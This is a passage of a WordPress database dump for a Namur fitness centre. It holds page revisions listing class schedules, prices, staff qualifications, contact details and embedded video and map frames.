min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-04-21 08:50:51', '2015-04-21 08:50:51', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(469, 1, '2014-12-15 19:46:29', '2014-12-15 19:46:29', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\" valign=\"center\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-12-15 19:46:29', '2014-12-15 19:46:29', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(471, 1, '2015-04-21 08:50:04', '2015-04-21 08:50:04', '', 'Séances', '', 'publish', 'open', 'open', '', 'seances', '', '', '2015-04-21 08:50:04', '2015-04-21 08:50:04', '', 0, 'http://www.crosstrainingcenter.be/?p=471', 4, 'nav_menu_item', '', 0),
(477, 1, '2015-04-21 09:07:44', '2015-04-21 09:07:44', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Prise de RDV :</h1>\r\nLes réservations de Team Training se font en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\nLes séances de Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2015-04-21 09:07:44', '2015-04-21 09:07:44', '', 9, 'http://www.crosstrainingcenter.be/9-revision-v1/', 0, 'revision', '', 0),
(481, 1, '2015-04-21 09:46:39', '2015-04-21 09:46:39', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n        <li>Formation Personal Trainer (Parnasse)</li>\r\n	<li>Formation Les mills Coach BodyBoxe</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>LesMills Coach</li>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2015-04-21 09:46:39', '2015-04-21 09:46:39', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(480, 1, '2015-04-21 09:40:45', '2015-04-21 09:40:45', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>LesMills Coach</li>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-420\" alt=\"youssra_boujat_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/youssra_boujat_pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Youssra Boujat</h2>\r\n<h5>Instructeur de Zumba Fitness</h5>\r\n<ul>\r\n	<li>Etudiante infirmière à l\'HENALLUX</li>\r\n	<li>Basketteuse au Belfius Namur Capital</li>\r\n	<li>Pratiquante de courses à pieds et de fitness</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2015-04-21 09:40:45', '2015-04-21 09:40:45', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(484, 1, '2015-04-21 10:03:23', '2015-04-21 10:03:23', '', 'map', '', 'inherit', 'open', 'open', '', 'map', '', '', '2015-04-21 10:03:23', '2015-04-21 10:03:23', '', 0, 'http://www.crosstrainingcenter.be/wp-content/uploads/2015/04/map.png', 0, 'attachment', 'image/png', 0),
(485, 1, '2015-04-22 07:38:04', '2015-04-22 07:38:04', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"arrondi\">\n\n<div align=\"center\">\n\nPrésentation du Cross Training Namur\n\n<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\n<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\n\n</div>\n\n</div></td>\n\n</tr>\n</table>', 'En images', '', 'inherit', 'open', 'open', '', '369-autosave-v1', '', '', '2015-04-22 07:38:04', '2015-04-22 07:38:04', '', 369, 'http://www.crosstrainingcenter.be/369-autosave-v1/', 0, 'revision', '', 0),
(486, 1, '2015-04-22 07:38:29', '2015-04-22 07:38:29', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n\r\nPrésentation du Cross Training Namur\r\n\r\n<iframe src=\"//www.youtube.com/embed/_os-BkWwGKU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n<iframe src=\"//www.youtube.com/embed/v=dgKynOMF_HI\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En images', '', 'inherit', 'open', 'open', '', '369-revision-v1', '', '', '2015-04-22 07:38:29', '2015-04-22 07:38:29', '', 369, 'http://www.crosstrainingcenter.be/369-revision-v1/', 0, 'revision', '', 0),
(487, 1, '2015-04-22 07:39:30', '2015-04-22 07:39:30', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n\r\nPrésentation du Cross Training Namur\r\n\r\n<iframe src=\"//www.youtube.com/embed/_os-BkWwGKU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n<iframe src=\"//www.youtube.com/embed/dgKynOMF_HI\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En images', '', 'inherit', 'open', 'open', '', '369-revision-v1', '', '', '2015-04-22 07:39:30', '2015-04-22 07:39:30', '', 369, 'http://www.crosstrainingcenter.be/369-revision-v1/', 0, 'revision', '', 0),
(490, 3, '2015-09-02 17:07:45', '2015-09-02 17:07:45', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\"><img class=\"alignnone size-full wp-image-494\" alt=\"nouvelles seances CT\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\" width=\"900\" height=\"635\" /></a>\n\n\n<h1></h1>\n<h2>Réservation des séances :</h2>\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\n<h1></h1>\n<h2>Duo Training:</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\nEntrainements à deux personnes sous la supervision d’un coach.\n<h1></h1>\n<h2>Personal Training:</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\nUn coach par personne, l’idéal pour progresser plus rapidement!\n<h1></h1>\n<h2>Coaching nutritionnel:</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\nRendez-vous avec une diététicienne pour améliorer votre santé.\n<h1></h1>\n<h2>Prix</h2>\n<table>\n<tbody>\n<tr>\n<td class=\"ttitrehprix\">Séance Booster</td>\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Personal Training</td>\n<td class=\"tcelluleprix\">60 min : 60.00€\n30 min : 35.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Duo Training</td>\n<td class=\"tcelluleprix\">60 min : 35.00€\n30 min : 20.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Small Group Training</td>\n<td class=\"tcelluleprix\">1 séance : 10.00€\n1 carte de 10 séances : 90.00€ (valable 6 mois)\n1 carte de 20 séances : 150.00€ (valable 6 mois)\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Préparation physique</td>\n<td class=\"tcelluleprix\">1 séance : 40.00€\nSéance de 30 min orientée sur les spécificités du sport</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\nSuivi 15,00€</td>\n</tr>\n</tbody>\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-autosave-v1', '', '', '2015-09-02 17:07:45', '2015-09-02 17:07:45', '', 363, 'http://www.crosstrainingcenter.be/363-autosave-v1/', 0, 'revision', '', 0),
(491, 3, '2015-09-02 16:56:52', '2015-09-02 16:56:52', '', 'Capture d’écran 2015-09-02 à 18.56.23', '', 'inherit', 'open', 'open', '', 'capture-decran-2015-09-02-a-18-56-23', '', '', '2015-09-02 16:56:52', '2015-09-02 16:56:52', '', 363, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/Capture-d’écran-2015-09-02-à-18.56.23.png', 0, 'attachment', 'image/png', 0),
